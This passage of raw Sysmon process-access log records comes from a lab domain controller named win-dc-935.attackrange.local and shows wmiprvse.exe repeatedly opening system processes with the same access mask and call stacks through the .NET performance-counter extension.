.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006184Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006183Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006182Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006181Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006180Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006179Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006178Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006177Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006176Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006175Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006174Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006173Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006172Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006171Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006170Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006169Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006168Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006167Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006166Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006165Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006164Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006163Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006162Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006161Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006160Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 